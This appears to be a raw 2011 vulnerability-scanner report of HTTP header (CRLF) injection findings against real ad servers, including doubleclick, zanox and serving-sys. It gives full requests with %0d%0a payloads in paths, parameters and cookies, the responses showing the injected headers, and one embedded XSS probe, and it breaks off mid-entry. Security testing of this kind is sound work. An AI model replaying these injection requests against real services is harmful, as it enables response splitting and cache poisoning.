The value of REST URL parameter 1 is copied into the Location response header. The payload 8b0ee%0d%0a76dcc98cc56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8b0ee%0d%0a76dcc98cc56/N815.zdenterprise/B4822628.25;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8b0ee 76dcc98cc56/N815.zdenterprise/B4822628.25%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5dc39%0d%0a0f8fde46ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5dc39%0d%0a0f8fde46ef2/N815.zdenterprise/B5069510.14;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5dc39 0f8fde46ef2/N815.zdenterprise/B5069510.14%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:41 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecae%0d%0aaf16c007475 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ecae%0d%0aaf16c007475/N815.zdenterprise/B5069510.30;sz=1x1;ord=%n? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5ecae af16c007475/N815.zdenterprise/B5069510.30%3Bsz%3D1x1%3Bord%3D%25n: Date: Sun, 06 Feb 2011 13:22:38 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2f022%0d%0a00140ddecd3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2f022%0d%0a00140ddecd3/N815.zdenterprise/B5069510.9;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2f022 00140ddecd3/N815.zdenterprise/B5069510.9%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:38 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 36cf6%0d%0a6a7c8a5efd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36cf6%0d%0a6a7c8a5efd6/entzd.eweek/ibmtutorial;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/36cf6 6a7c8a5efd6/entzd.eweek/ibmtutorial%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 17ca4%0d%0a41f12a81071 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /17ca4%0d%0a41f12a81071/entzd.eweek/ibmwidget/cloudimu;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/17ca4 41f12a81071/entzd.eweek/ibmwidget/cloudimu%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:41 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 22974%0d%0a6a1f47d2342 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /22974%0d%0a6a1f47d2342/entzd.eweek/ibmwidget/virtimu;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/22974 6a1f47d2342/entzd.eweek/ibmwidget/virtimu%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:40 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 14c2c%0d%0ab2351d233db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /14c2c%0d%0ab2351d233db/N553.158901.DATAXU/B4970757.11;sz=468x60;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/14c2c b2351d233db/N553.158901.DATAXU/B4970757.11%3Bsz%3D468x60%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D: Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 42c36%0d%0abbd914c4d3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /42c36%0d%0abbd914c4d3b/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/42c36 bbd914c4d3b/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:28 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 75aa0%0d%0a89c0f58a50b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75aa0%0d%0a89c0f58a50b/entzd.base/itmanagement HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/75aa0 89c0f58a50b/entzd.base/itmanagement: Date: Sun, 06 Feb 2011 17:17:44 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 80fc5%0d%0a18367c4310e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /80fc5%0d%0a18367c4310e/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_ HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/80fc5 18367c4310e/oiq.man.homeappliance/%3Bmfg%3D145%3Btile%3D1%3Bsz%3D720x90%2C728x90%3Bord%3D1296942753%3Bu%3Dmfg_145%7Csid_: Date: Sat, 05 Feb 2011 22:27:55 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 56f15%0d%0a1b7eaef4d04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /56f15%0d%0a1b7eaef4d04/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/56f15 1b7eaef4d04/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:29 GMT Server: GFE/2.0 Connection: close
The value of the 14786739C435671106&ULP request parameter is copied into the Location response header. The payload d2ed0%0d%0acf60b7507b4 was submitted in the 14786739C435671106&ULP parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=d2ed0%0d%0acf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:07 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C114178S1469386944579519491T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C114178S1469386944579519491T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:07 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.bild.ded2ed0 cf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386944579519491 pragma: no-cache cache-control: no-store
3.17. http://ad.zanox.com/tpv/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.zanox.com
Path: /tpv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96c36%0d%0a1e76b109467 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36%0d%0a1e76b109467=1 HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:40:04 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C322704S1469387185567450118T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C322704S1469387185567450118T0I14786739C0T0; expires=Sat, 07-May-2011 17:40:04 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36 1e76b109467=1&zanpid=14786739C435671106T1469387185567450118 pragma: no-cache cache-control: no-store
The value of the zpar0 request parameter is copied into the Location response header. The payload 8b1c7%0d%0aa5975a40bc was submitted in the zpar0 parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7%0d%0aa5975a40bc HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:12 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C127423S1469386967060988934T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C127423S1469386967060988934T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7 a5975a40bc&zanpid=14786739C435671106T1469386967060988934 pragma: no-cache cache-control: no-store
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 803fb%0d%0a71e6bfcf0d1 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb%0d%0a71e6bfcf0d1; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb 71e6bfcf0d1; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 17:18:54 GMT Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b588%0d%0ae9f2ac9bef5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588%0d%0ae9f2ac9bef5; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload c3e38%0d%0aea51dd9334e was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4363488~~0~~~^ebAdDuration~10~0~01020^ebAboveTheFoldDuration~9~0~01020^ebAboveTheFold~0~0~01020|4443510~~0~~~^ebAdDuration~1~0~01020^ebAboveTheFoldDuration~1~0~01020^ebAboveTheFold~0~0~01020&OptOut=0&ebRandom=0.8359781634062529&flv=10.1103&wmpv=0&res=128&bwVal=c3e38%0d%0aea51dd9334e&bwTime=1296998548216 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b9a93%0d%0afca8ffe0901 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93%0d%0afca8ffe0901; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 131a5%0d%0ad2c2e010a34 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
